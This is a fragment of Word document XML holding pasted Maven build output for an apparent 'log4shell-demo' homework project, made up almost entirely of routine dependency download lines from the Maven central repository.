    <w:p w14:paraId="5B0103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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9-stable-1/plexus-container-default-1.0-alpha-9-stable-1.jar (194 kB at 2.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DD441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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.2.1/maven-artifact-manager-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389CA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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.2.1/maven-settings-2.2.1.jar (49 kB at 476 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681AED3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https://repo.maven.apache.org/maven2/backport-util-concurrent/backport-util-concurrent/3.1/backport-util-concurrent-3.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0AF9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https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.2.1/maven-profile-2.2.1.jar (35 kB at 316 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C021A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.2.1/maven-plugin-registry-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B32D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.2.1/maven-artifact-manager-2.2.1.jar (68 kB at 583 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDBE8A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https://repo.maven.apache.org/maven2/junit/junit/4.12/junit-4.12.jar (315 kB at 2.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227971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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.11/plexus-interpolation-1.11.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FDD7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https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.2.1/maven-project-2.2.1.jar (156 kB at 1.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503562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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.2.1/maven-core-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B171B3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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.2.1/maven-model-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307C697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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.2.1/maven-plugin-registry-2.2.1.jar (30 kB at 222 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE7F6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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.2.1/maven-plugin-parameter-documenter-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E533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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.2.1/maven-model-2.2.1.jar (88 kB at 604 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E52F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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-jdk14/1.5.6/slf4j-jdk14-1.5.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5571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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.11/plexus-interpolation-1.11.jar (51 kB at 349 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF6AA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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.5.6/slf4j-api-1.5.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE402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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.2.1/maven-core-2.2.1.jar (178 kB at 1.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761EF4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https://repo.maven.apache.org/maven2/org/slf4j/jcl-over-slf4j/1.5.6/jcl-over-slf4j-1.5.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C979D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.2.1/maven-plugin-parameter-documenter-2.2.1.jar (22 kB at 142 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91B66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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.0/maven-reporting-api-3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140F87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https://repo.maven.apache.org/maven2/backport-util-concurrent/backport-util-concurrent/3.1/backport-util-concurrent-3.1.jar (332 kB at 2.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D009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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.2.1/maven-repository-metadata-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F860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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-jdk14/1.5.6/slf4j-jdk14-1.5.6.jar (8.8 kB at 54 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6093AB1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https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.2.1/maven-error-diagnostics-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1662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https://repo.maven.apache.org/maven2/org/slf4j/jcl-over-slf4j/1.5.6/jcl-over-slf4j-1.5.6.jar (17 kB at 100 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BE386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https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.2.1/maven-monitor-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19862F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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.5.6/slf4j-api-1.5.6.jar (22 kB at 130 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEAF6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https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1/classworlds-1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF379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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.0/maven-reporting-api-3.0.jar (11 kB at 63 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A763F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https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.2.1/maven-toolchain-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75677D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.2.1/maven-repository-metadata-2.2.1.jar (26 kB at 143 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4C8C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https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M8/qdox-2.0-M8.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B97E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https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.2.1/maven-error-diagnostics-2.2.1.jar (13 kB at 70 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2F31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https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.2.1/maven-monitor-2.2.1.jar (10 kB at 56 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199774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https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1/classworlds-1.1.jar (38 kB at 198 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625EF3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https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.2.1/maven-toolchain-2.2.1.jar (38 kB at 192 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5E6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https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M8/qdox-2.0-M8.jar (316 kB at 1.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7AC6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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631A10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9EFF3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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056C92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https://repo.maven.apache.org/maven2/org/apache/maven/shared/file-management/3.0.0/file-management-3.0.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313EF6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https://repo.maven.apache.org/maven2/org/apache/maven/shared/file-management/3.0.0/file-management-3.0.0.pom (4.7 kB at 195 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578461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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/22/maven-shared-components-22.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA017A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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/22/maven-shared-components-22.pom (5.1 kB at 232 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B80D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/27/maven-parent-27.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EDAB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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/27/maven-parent-27.pom (41 kB at 1.4 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCCB1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https://repo.maven.apache.org/maven2/org/apache/apache/17/apache-17.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB0C8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https://repo.maven.apache.org/maven2/org/apache/apache/17/apache-17.pom (16 kB at 803 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B10E6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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-io/3.0.0/maven-shared-io-3.0.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52689E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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-io/3.0.0/maven-shared-io-3.0.0.pom (4.2 kB at 160 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A530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https://repo.maven.apache.org/maven2/org/apache/maven/maven-compat/3.0/maven-compat-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664D1DD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https://repo.maven.apache.org/maven2/org/apache/maven/maven-compat/3.0/maven-compat-3.0.pom (4.0 kB at 149 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377F33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https://repo.maven.apache.org/maven2/org/apache/maven/wagon/wagon-provider-api/1.0-beta-6/wagon-provider-api-1.0-beta-6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D6410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https://repo.maven.apache.org/maven2/org/apache/maven/wagon/wagon-provider-api/1.0-beta-6/wagon-provider-api-1.0-beta-6.pom (1.8 kB at 70 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278A8C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https://repo.maven.apache.org/maven2/org/apache/maven/wagon/wagon/1.0-beta-6/wagon-1.0-beta-6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094D4DF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https://repo.maven.apache.org/maven2/org/apache/maven/wagon/wagon/1.0-beta-6/wagon-1.0-beta-6.pom (12 kB at 619 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B3FB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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.4.2/plexus-utils-1.4.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BDAB1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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.4.2/plexus-utils-1.4.2.pom (2.0 kB at 70 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A83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https://repo.maven.apache.org/maven2/org/apache/maven/wagon/wagon-provider-api/2.10/wagon-provider-api-2.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A70CB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https://repo.maven.apache.org/maven2/org/apache/maven/wagon/wagon-provider-api/2.10/wagon-provider-api-2.10.pom (1.7 kB at 82 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042EA03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https://repo.maven.apache.org/maven2/org/apache/maven/wagon/wagon/2.10/wagon-2.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC519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https://repo.maven.apache.org/maven2/org/apache/maven/wagon/wagon/2.10/wagon-2.10.pom (21 kB at 1.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238058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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/26/maven-parent-26.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD2606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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/26/maven-parent-26.pom (40 kB at 1.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC861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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.15/plexus-utils-3.0.15.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545CB2E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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.15/plexus-utils-3.0.15.pom (3.1 kB at 150 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034892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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.0/maven-shared-utils-3.0.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12329E2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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.0/maven-shared-utils-3.0.0.pom (5.6 kB at 254 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE90B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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/21/maven-shared-components-21.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1963FD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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/21/maven-shared-components-21.pom (5.1 kB at 213 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF40C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/25/maven-parent-25.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9CC8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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/25/maven-parent-25.pom (37 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D60B5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https://repo.maven.apache.org/maven2/org/apache/apache/15/apache-15.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7EB6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https://repo.maven.apache.org/maven2/org/apache/apache/15/apache-15.pom (15 kB at 726 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3192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https://repo.maven.apache.org/maven2/commons-io/commons-io/2.4/commons-io-2.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DAEC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https://repo.maven.apache.org/maven2/commons-io/commons-io/2.4/commons-io-2.4.pom (10 kB at 462 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BEB5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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/25/commons-parent-25.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335444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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/25/commons-parent-25.pom (48 kB at 2.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D181E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https://repo.maven.apache.org/maven2/org/apache/apache/9/apache-9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7079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https://repo.maven.apache.org/maven2/org/apache/apache/9/apache-9.pom (15 kB at 722 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB42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https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/3.5.0/maven-archiver-3.5.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2644D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/3.5.0/maven-archiver-3.5.0.pom (4.5 kB at 178 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102C92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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/33/maven-shared-components-33.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FFE5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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/33/maven-shared-components-33.pom (5.1 kB at 232 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1045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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/4.2.0/plexus-archiver-4.2.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073EC31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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/4.2.0/plexus-archiver-4.2.0.pom (4.8 kB at 210 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCED40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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/3.2.0/plexus-io-3.2.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A7AF8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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/3.2.0/plexus-io-3.2.0.pom (4.5 kB at 239 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0605E2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https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.19/commons-compress-1.19.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD6D5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https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.19/commons-compress-1.19.pom (18 kB at 868 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBFEB7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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/48/commons-parent-48.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA02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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/48/commons-parent-48.pom (72 kB at 3.4 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F2B4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https://repo.maven.apache.org/maven2/org/iq80/snappy/snappy/0.4/snappy-0.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171182C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https://repo.maven.apache.org/maven2/org/iq80/snappy/snappy/0.4/snappy-0.4.pom (15 kB at 632 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D3469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https://repo.maven.apache.org/maven2/org/tukaani/xz/1.8/xz-1.8.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546F1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https://repo.maven.apache.org/maven2/org/tukaani/xz/1.8/xz-1.8.pom (1.9 kB at 100 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAEB0D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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.25/plexus-interpolation-1.25.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C37F3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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.25/plexus-interpolation-1.25.pom (2.6 kB at 132 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F49A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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/4.2.1/plexus-archiver-4.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D536F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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/4.2.1/plexus-archiver-4.2.1.pom (4.8 kB at 193 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A992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https://repo.maven.apache.org/maven2/org/apache/maven/shared/file-management/3.0.0/file-management-3.0.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5C348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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-io/3.0.0/maven-shared-io-3.0.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B572CD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https://repo.maven.apache.org/maven2/org/apache/maven/maven-compat/3.0/maven-compat-3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6087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https://repo.maven.apache.org/maven2/org/apache/maven/wagon/wagon-provider-api/2.10/wagon-provider-api-2.10.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B7C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/3.5.0/maven-archiver-3.5.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE28FE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https://repo.maven.apache.org/maven2/org/apache/maven/shared/file-management/3.0.0/file-management-3.0.0.jar (35 kB at 1.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B69B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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/4.2.1/plexus-archiver-4.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C75AB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https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/3.5.0/maven-archiver-3.5.0.jar (26 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295411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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/3.2.0/plexus-io-3.2.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1939005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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-io/3.0.0/maven-shared-io-3.0.0.jar (41 kB at 964 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACEAF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https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.19/commons-compress-1.19.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F18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https://repo.maven.apache.org/maven2/org/apache/maven/wagon/wagon-provider-api/2.10/wagon-provider-api-2.10.jar (54 kB at 1.9 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FB29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https://repo.maven.apache.org/maven2/org/iq80/snappy/snappy/0.4/snappy-0.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7FBF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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/3.2.0/plexus-io-3.2.0.jar (76 kB at 1.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2CDD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https://repo.maven.apache.org/maven2/org/tukaani/xz/1.8/xz-1.8.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182F8DF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https://repo.maven.apache.org/maven2/org/iq80/snappy/snappy/0.4/snappy-0.4.jar (58 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7365326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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.3.0/plexus-utils-3.3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4BDA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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/4.2.1/plexus-archiver-4.2.1.jar (196 kB at 3.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A8A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-compat/3.0/maven-compat-3.0.jar (285 kB at 4.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1070A2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https://repo.maven.apache.org/maven2/org/tukaani/xz/1.8/xz-1.8.jar (109 kB at 1.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C262D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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.3.0/plexus-utils-3.3.0.jar (263 kB at 3.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA090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https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.19/commons-compress-1.19.jar (615 kB at 6.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCB1D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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743981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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2A6F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4015DD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spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CFF2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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-buildpack-platform/2.5.5/spring-boot-buildpack-platform-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A1AF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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-buildpack-platform/2.5.5/spring-boot-buildpack-platform-2.5.5.pom (3.2 kB at 107 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF3C9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https://repo.maven.apache.org/maven2/net/java/dev/jna/jna-platform/5.7.0/jna-platform-5.7.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135382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https://repo.maven.apache.org/maven2/net/java/dev/jna/jna-platform/5.7.0/jna-platform-5.7.0.pom (1.8 kB at 78 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CEFE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https://repo.maven.apache.org/maven2/net/java/dev/jna/jna/5.7.0/jna-5.7.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71051A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https://repo.maven.apache.org/maven2/net/java/dev/jna/jna/5.7.0/jna-5.7.0.pom (1.6 kB at 75 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF24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https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.20/commons-compress-1.20.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8D5B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https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.20/commons-compress-1.20.pom (18 kB at 830 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BCA9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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC608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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.pom (6.6 kB at 348 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4742AD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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-client/4.5.13/httpcomponents-client-4.5.13.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FDCB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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-client/4.5.13/httpcomponents-client-4.5.13.pom (16 kB at 819 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6EA6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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-parent/11/httpcomponents-parent-11.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220739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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-parent/11/httpcomponents-parent-11.pom (35 kB at 1.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F13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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.13/httpcore-4.4.13.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1843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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.13/httpcore-4.4.13.pom (5.0 kB at 226 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF545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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-core/4.4.13/httpcomponents-core-4.4.13.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6887BE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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-core/4.4.13/httpcomponents-core-4.4.13.pom (13 kB at 527 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB48E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https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD6F5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https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.pom (19 kB at 915 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A3CD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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/34/commons-parent-34.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719E34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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/34/commons-parent-34.pom (56 kB at 2.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730ACB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https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.11/commons-codec-1.11.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515E38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https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.11/commons-codec-1.11.pom (14 kB at 635 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B123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https://repo.maven.apache.org/maven2/org/tomlj/tomlj/1.0.0/tomlj-1.0.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7499D0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https://repo.maven.apache.org/maven2/org/tomlj/tomlj/1.0.0/tomlj-1.0.0.pom (2.8 kB at 128 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD192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https://repo.maven.apache.org/maven2/org/antlr/antlr4-runtime/4.7.2/antlr4-runtime-4.7.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F680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https://repo.maven.apache.org/maven2/org/antlr/antlr4-runtime/4.7.2/antlr4-runtime-4.7.2.pom (3.6 kB at 172 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BAD7A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https://repo.maven.apache.org/maven2/org/antlr/antlr4-master/4.7.2/antlr4-master-4.7.2.pom</w:t>
      </w:r>
    </w:p>
